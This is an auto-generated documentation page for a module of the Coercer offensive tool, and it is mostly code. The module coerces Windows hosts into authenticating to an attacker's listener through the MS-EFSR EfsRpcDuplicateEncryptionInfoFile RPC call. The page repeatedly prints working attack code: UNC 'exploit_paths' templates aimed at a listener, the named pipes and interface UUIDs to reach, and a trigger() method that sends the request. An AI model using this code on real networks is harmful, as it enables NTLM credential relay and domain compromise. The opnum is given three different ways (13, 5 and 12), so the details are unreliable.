coercer.methods.MS_EFSR.EfsRpcDuplicateEncryptionInfoFile
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : EfsRpcDuplicateEncryptionInfoFile.py 4# Author : Podalirius (@podalirius_) 5# Date created : 16 Sep 2022 6 7 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 9from coercer.network.DCERPCSessionError import DCERPCSessionError 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13 14class EFS_RPC_BLOB(NDRSTRUCT): 15 structure = ( 16 ('Data', DWORD), 17 ('cbData', PCHAR), 18 ) 19 20 21class _EfsRpcDuplicateEncryptionInfoFile(NDRCALL): 22 """ 23 Structure to make the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 24 """ 25 opnum = 13 26 structure = ( 27 ('SrcFileName', WSTR), # Type: wchar_t * 28 ('DestFileName', WSTR), # Type: wchar_t * 29 ('dwCreationDisposition', DWORD), # Type: DWORD 30 ('dwAttributes', DWORD), # Type: DWORD 31 ('RelativeSD', EFS_RPC_BLOB), # Type: EFS_RPC_BLOB * 32 ('bInheritHandle', BOOL), # Type: BOOL 33 ) 34 35 36class _EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL): 37 """ 38 Structure to parse the response of the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 39 """ 40 structure = () 41 42 43class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL): 44 """ 45 Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 46 47 Method found by: 48 - [@topotam77](https://twitter.com/topotam77) 49 """ 50 51 exploit_paths = [ 52 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 53 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 54 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 55 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 56 ] 57 58 access = { 59 "ncan_np": [ 60 { 61 "namedpipe": r"\PIPE\efsrpc", 62 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 63 "version": "1.0" 64 }, 65 { 66 "namedpipe": r"\PIPE\lsarpc", 67 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 68 "version": "1.0" 69 }, 70 { 71 "namedpipe": r"\PIPE\samr", 72 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 73 "version": "1.0" 74 }, 75 { 76 "namedpipe": r"\PIPE\lsass", 77 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 78 "version": "1.0" 79 }, 80 { 81 "namedpipe": r"\PIPE\netlogon", 82 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 83 "version": "1.0" 84 }, 85 ], 86 "ncacn_ip_tcp": [ 87 { 88 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 89 "version": "1.0" 90 }, 91 { 92 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 93 "version": "1.0" 94 } 95 ] 96 } 97 98 protocol = { 99 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 100 "shortname": "MS-EFSR" 101 } 102 103 function = { 104 "name": "EfsRpcDuplicateEncryptionInfoFile", 105 "opnum": 12, 106 "vulnerable_arguments": ["SrcFileName"] 107 } 108 109 def trigger(self, dcerpc_session, target): 110 if dcerpc_session is not None: 111 try: 112 request = _EfsRpcDuplicateEncryptionInfoFile() 113 request['SrcFileName'] = self.path 114 request['DestFileName'] = self.path 115 request['dwCreationDisposition'] = 0 116 request['dwAttributes'] = 0 117 request['RelativeSD'] = EFS_RPC_BLOB() 118 request['bInheritHandle'] = 0 119 resp = dcerpc_session.request(request) 120 return "" 121 except Exception as err: 122 return err 123 else: 124 print("[!] Error: dce is None, you must call connect() first.") 125 return None
class
EFS_RPC_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
44class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL): 45 """ 46 Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 47 48 Method found by: 49 - [@topotam77](https://twitter.com/topotam77) 50 """ 51 52 exploit_paths = [ 53 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 54 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 55 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 56 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 57 ] 58 59 access = { 60 "ncan_np": [ 61 { 62 "namedpipe": r"\PIPE\efsrpc", 63 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 64 "version": "1.0" 65 }, 66 { 67 "namedpipe": r"\PIPE\lsarpc", 68 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 69 "version": "1.0" 70 }, 71 { 72 "namedpipe": r"\PIPE\samr", 73 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 74 "version": "1.0" 75 }, 76 { 77 "namedpipe": r"\PIPE\lsass", 78 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 79 "version": "1.0" 80 }, 81 { 82 "namedpipe": r"\PIPE\netlogon", 83 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 84 "version": "1.0" 85 }, 86 ], 87 "ncacn_ip_tcp": [ 88 { 89 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 90 "version": "1.0" 91 }, 92 { 93 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 94 "version": "1.0" 95 } 96 ] 97 } 98 99 protocol = { 100 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 101 "shortname": "MS-EFSR" 102 } 103 104 function = { 105 "name": "EfsRpcDuplicateEncryptionInfoFile", 106 "opnum": 12, 107 "vulnerable_arguments": ["SrcFileName"] 108 } 109 110 def trigger(self, dcerpc_session, target): 111 if dcerpc_session is not None: 112 try: 113 request = _EfsRpcDuplicateEncryptionInfoFile() 114 request['SrcFileName'] = self.path 115 request['DestFileName'] = self.path 116 request['dwCreationDisposition'] = 0 117 request['dwAttributes'] = 0 118 request['RelativeSD'] = EFS_RPC_BLOB() 119 request['bInheritHandle'] = 0 120 resp = dcerpc_session.request(request) 121 return "" 122 except Exception as err: 123 return err 124 else: 125 print("[!] Error: dce is None, you must call connect() first.") 126 return None
Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 5) of MS-EFSR Protocol
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function =
{'name': 'EfsRpcDuplicateEncryptionInfoFile', 'opnum': 12, 'vulnerable_arguments': ['SrcFileName']}
def
trigger(self, dcerpc_session, target):
110 def trigger(self, dcerpc_session, target): 111 if dcerpc_session is not None: 112 try: 113 request = _EfsRpcDuplicateEncryptionInfoFile() 114 request['SrcFileName'] = self.path 115 request['DestFileName'] = self.path 116 request['dwCreationDisposition'] = 0 117 request['dwAttributes'] = 0 118 request['RelativeSD'] = EFS_RPC_BLOB() 119 request['bInheritHandle'] = 0 120 resp = dcerpc_session.request(request) 121 return "" 122 except Exception as err: 123 return err 124 else: 125 print("[!] Error: dce is None, you must call connect() first.") 126 return None